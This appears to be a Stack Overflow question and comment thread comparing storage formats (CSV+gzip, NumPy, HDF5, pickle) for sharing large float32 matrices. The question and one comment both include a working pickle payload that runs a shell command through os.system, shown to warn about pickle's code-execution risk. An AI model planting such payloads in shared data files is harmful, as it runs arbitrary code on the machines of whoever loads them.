
I am searching for the best possible solution for storing large, dense 2D matrices of floating-point data, generally float32.

The goal would be to share scientific data more easily from websites like the Internet Archive and make such data FAIR.

My current approaches (listed below) fall short of the desired goal, so I thought I might ask here, hoping to find something new, such as a better data structure. Even though my examples are in Python, the solution does not need to be in Python. Any good solution will do, even one in COBOL!

CSV-based

One approach I have tried is to store the values as compressed CSVs using pandas, but this is excruciatingly slow, and the resulting compression is not exactly optimal (generally around 50% of the plain CSV size on the data I tried it on, which is not bad, but not enough to make this viable). In this example I am using gzip. I have also tried LZMA, but it is generally much slower and, at least on the data I tried it on, does not yield a significantly better result.

import pandas as pd
my_data: pd.DataFrame = create_my_data_doing_something()
my_data.to_csv("my_data_saved.csv.gz") 
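For completeness, reading such a file back looks like the sketch below. Note that CSV stores characters rather than binary values, so the float32 dtype is lost on disk and has to be re-imposed on load.

import pandas as pd

# pandas infers the gzip codec from the ".gz" suffix on both write and read.
# The dtype is not preserved by CSV, so float32 is re-imposed here.
restored = pd.read_csv("my_data_saved.csv.gz", index_col=0).astype("float32")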

NumPy-based

Another solution is to store the data in a NumPy array and then compress it on disk.

import numpy as np
my_data: np.ndarray = create_my_data_doing_something()
np.save("my_data_saved.npy", my_data)

and afterwards

gzip -k my_data_saved.npy
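An equivalent single-step route, for reference, is NumPy's built-in zip-based compression; a minimal sketch, not part of the benchmark below:

import numpy as np

# Same placeholder data as above.
my_data: np.ndarray = create_my_data_doing_something()

# savez_compressed stores the array inside a zip archive using DEFLATE,
# i.e. essentially the same codec as the external gzip call above.
np.savez_compressed("my_data_saved.npz", my_data=my_data)

# Loading returns a lazy NpzFile; the array is retrieved by keyword.
restored = np.load("my_data_saved.npz")["my_data"]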

NumPy with HDF5

Another possibility is HDF5 (via h5py), but as shown in the benchmark below it does no better than plain NumPy.

import h5py

with h5py.File("my_data_saved.h5", "w") as hf:
    hf.create_dataset("my_data_saved", data=my_data)
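As discussed in the comments below, h5py applies no compression unless it is asked to. A sketch with the gzip filter switched on, which I have not yet benchmarked:

import h5py

# Enabling a filter makes HDF5 chunk the dataset and compress each chunk;
# "gzip" is the DEFLATE filter available in every HDF5 build.
with h5py.File("my_data_saved_compressed.h5", "w") as hf:
    hf.create_dataset(
        "my_data_saved",
        data=my_data,
        compression="gzip",
        compression_opts=9,  # 0-9, analogous to gzip command-line levels
    )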

Issues with using the NumPy format

While this may be a good solution, it limits the usability of the data to people who can use Python. Of course, that is a vast pool of people; still, in my circles, many biologists and mathematicians abhor Python and prefer to stick to MATLAB and R (and therefore would not know what to do with a .npy.gz file).
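Purely as a sketch of how that gap could be bridged from the Python side (not something I have benchmarked), the same matrix can be re-exported to a .mat file, which MATLAB opens natively and R can read through packages such as R.matlab:

import numpy as np
from scipy.io import savemat

my_data: np.ndarray = create_my_data_doing_something()

# Writes a MATLAB-readable .mat file; do_compression applies zlib/DEFLATE
# to the variables inside the file.
savemat("my_data_saved.mat", {"my_data": my_data}, do_compression=True)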

Pickle

Another solution, as correctly pointed out by @lojza, is to store the data in a pickle object, which may also be compressed on disk. In my benchmarks (see below), Pickle achieves a compression ratio comparable to that of NumPy.

import pickle

import compress_pickle
import numpy as np

my_data: np.ndarray = create_my_data_doing_something()

# Uncompressed pickle
with open("my_data_saved.pkl", "wb") as f:
    pickle.dump(my_data, f)

# Compressed version
compress_pickle.dump(my_data, "my_data_saved.pkl.gz")
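For reference, the same compressed round trip can be done with the standard library alone; a minimal sketch:

import gzip
import pickle

import numpy as np

my_data: np.ndarray = create_my_data_doing_something()

# gzip-wrapped pickle using only the standard library, pinning the newest
# protocol for a more compact byte stream.
with gzip.open("my_data_saved.pkl.gz", "wb") as f:
    pickle.dump(my_data, f, protocol=pickle.HIGHEST_PROTOCOL)

with gzip.open("my_data_saved.pkl.gz", "rb") as f:
    restored = pickle.load(f)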

Issues with using the Pickle format

The issue with using Pickle is twofold: first, the same Python-dependency issue discussed above; second, there is a significant security issue: the Pickle format can be used for arbitrary-code-execution exploits. People should be wary of downloading random pickle files from the internet (and here the goal is precisely to get people to share datasets on the internet).

import pickle

# Build the exploit
command = b"""cat flag.txt"""

x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R." % command

# Test it: this runs `cat flag.txt` on the victim's machine
pickle.loads(x)
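A partial mitigation, sketched from the restricted-Unpickler pattern in the standard pickle documentation, is to refuse to resolve globals while unpickling. Note that a real allow-list for NumPy arrays would need a few numpy reconstruction helpers whitelisted, so this is only an illustration:

import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse to resolve any global: the payload above needs
        # __builtin__.getattr and os.system, so it would be rejected here.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()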

Benchmarks

I have run benchmarks to provide a baseline to improve upon. They show that NumPy is generally the best-performing choice and, to my knowledge, its format does not carry any security risk. It follows that a compressed NumPy array is currently the best contender; please help me find a better one! A minimal sketch to reproduce the size comparison is included after the plot.

Benchmark barplot
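The sketch below reproduces the size comparison on the synthetic data mentioned in the comments; the exact matrices, compression levels, and timing harness of the benchmark above differ.

import gzip
import os
import shutil

import numpy as np
import pandas as pd

# Synthetic stand-in suggested in the comments; the real data has lower
# entropy, so it compresses better.
matrix = np.random.uniform(size=(10_000, 1000)).astype(np.float32)

# CSV + gzip (pandas infers the codec from the ".gz" suffix).
pd.DataFrame(matrix).to_csv("bench.csv.gz", index=False)

# Plain .npy, then a gzip copy, mimicking `gzip -k my_data_saved.npy`.
np.save("bench.npy", matrix)
with open("bench.npy", "rb") as src, gzip.open("bench.npy.gz", "wb") as dst:
    shutil.copyfileobj(src, dst)

for path in ("bench.csv.gz", "bench.npy", "bench.npy.gz"):
    print(path, round(os.path.getsize(path) / 1e6, 1), "MB")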

Examples

To share some actual use cases for this relatively simple task, here are a couple of embeddings of the complete OBO Foundry graph. If there were a way to make these files smaller, sharing them would be significantly easier, allowing for more reproducible experiments and accelerating research in bio-ontologies (for this specific data) and other fields.

What other approaches may I try?

  • Check pickle https://docs.python.org/3/library/pickle.html – lojza May 30 '22 at 12:22
  • Hi! Pickle is much, much worse than any of the aforementioned options, even when using libraries such as [Compress pickle](https://github.com/lucianopaz/compress_pickle). It includes a significant amount of metadata about the Python object, which is not important for the data itself. – Luca Cappelletti May 30 '22 at 14:04
  • For 2D array? Metadata? – lojza May 30 '22 at 14:08
  • Of course, 2D arrays do not need metadata except for the shape, but when using Pickle, Python will store information such as variable names and so on. Pickle is not a good format for a number of reasons, and in this context chiefly because it is not a compressed format at all. – Luca Cappelletti May 30 '22 at 14:22
  • I am running some benchmarks which I will attach to the question soon. – Luca Cappelletti May 30 '22 at 14:30
  • One of the most worrying things about pickles is how easily one could add malicious code to the dataset and have a researcher execute it. One simple example would be: ```python import pickle # Build the exploit command = b"""cat flag.txt""" x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command # Test it pickle.loads(x) ``` – Luca Cappelletti May 30 '22 at 14:40
  • I have updated the question and added a section for Pickle. You were absolutely right on the file dimensions, as I must have recalled some other use cases: in this one, it is absolutely comparable with a NumPy array. – Luca Cappelletti May 30 '22 at 20:11
  • Not an expert, but may worth looking into popular formats in big data domain e.g. [HDF5](https://www.hdfgroup.org/solutions/hdf5/) – lpounng May 31 '22 at 04:47
  • Hello @lpounng, I have added H5 to the benchmark. You can see that it behaves exactly like a plain NumPy array, and performs worse than NumPy + gzip. It seems it does not actually execute any compression. – Luca Cappelletti May 31 '22 at 07:50
  • Very good job @LucaCappelletti! I see the issue with pickle now. Don't you have some speed/time data from your benchmarks to share please? Thank you – lojza May 31 '22 at 08:28
  • I forgot to track them, and it took hours to complete the whole benchmark, so I will re-run it (tracking time as well) once we have some other interesting contender, to give a complete view of the issue. – Luca Cappelletti May 31 '22 at 09:01
  • I am not surprised few people access this data. I normally get 350Mb/s of Internet bandwidth but can't even get 350kB/s from your site and it predicts 1 hour 40mins for the download of one of your 2.3GB gzipped CSV files! – Mark Setchell May 31 '22 at 11:32
  • That is not a website of mine, that's the Internet Archive, which is great as it is free and hosting large files is very expensive. There are a number of analogous websites with different tradeoffs and the internet connection issue is exactly why compression is important. We generally host the most important files on (pricy) servers with a dedicated internet connection. Do consider that the files I shared as examples are small compared to the TB-sized files we often have to deal with in my field of research. – Luca Cappelletti May 31 '22 at 11:46
  • Can you share a sample file from somewhere faster please? – Mark Setchell May 31 '22 at 12:43
  • Just using an `np.random.uniform(size=(10_000, 1000))` is already a reasonably good approximation for these files. As you can see, in the benchmarks I have also added integer cases as they also are of interest. – Luca Cappelletti May 31 '22 at 13:25
  • In the original files of course there is somewhat less entropy, as the values tend to follow an exponential distribution and therefore the compression rate tends to be better. – Luca Cappelletti May 31 '22 at 13:26
  • @LucaCappelletti [H5 uses Gzip under the hood](https://www.hdfgroup.org/2017/05/hdf5-data-compression-demystified-2-performance-tuning/), and definitely does some compression (otherwise it would be CSV-like performance). The (small) gap between Numpy+Gzip is probably due to H5 is designed to handle heterogeneous data types, while Numpy is purely numerical. – lpounng Jun 01 '22 at 02:00
  • Based on the benchmarks, I'd say we are hitting the compression limit for this type of data (let alone more parameter tuning e.g. cache/dictionary size). Very comprehensive work indeed! – lpounng Jun 01 '22 at 02:03
  • @lpounng the huge difference between CSV and NumPy is that, while neither is doing any compression, CSV writes out characters whereas NumPy writes the numbers out in a binary representation. H5 does not do any better than NumPy, suggesting it is not compressing anything. NumPy + gzip, instead, achieves a better compression rate. – Luca Cappelletti Jun 01 '22 at 07:08
  • @LucaCappelletti As I said, H5 uses Gzip under the hood, thus guarantees to use compression, just that the level of compression is worse than Numpy. *Not doing better* than Numpy is not an indication of *no* compression. These are 2 different concepts. – lpounng Jun 01 '22 at 07:24
  • @LucaCappelletti sorry wait a sec... For H5, did you enable compression options by setting parameters `compression` and `compression_opts` in `create_dataset`? – lpounng Jun 01 '22 at 07:37
  • The code used is the one shown in the question, unless they are enabled by default I did not use those parameters. Can you point me to a guide showing the best practices when using H5? – Luca Cappelletti Jun 01 '22 at 08:43
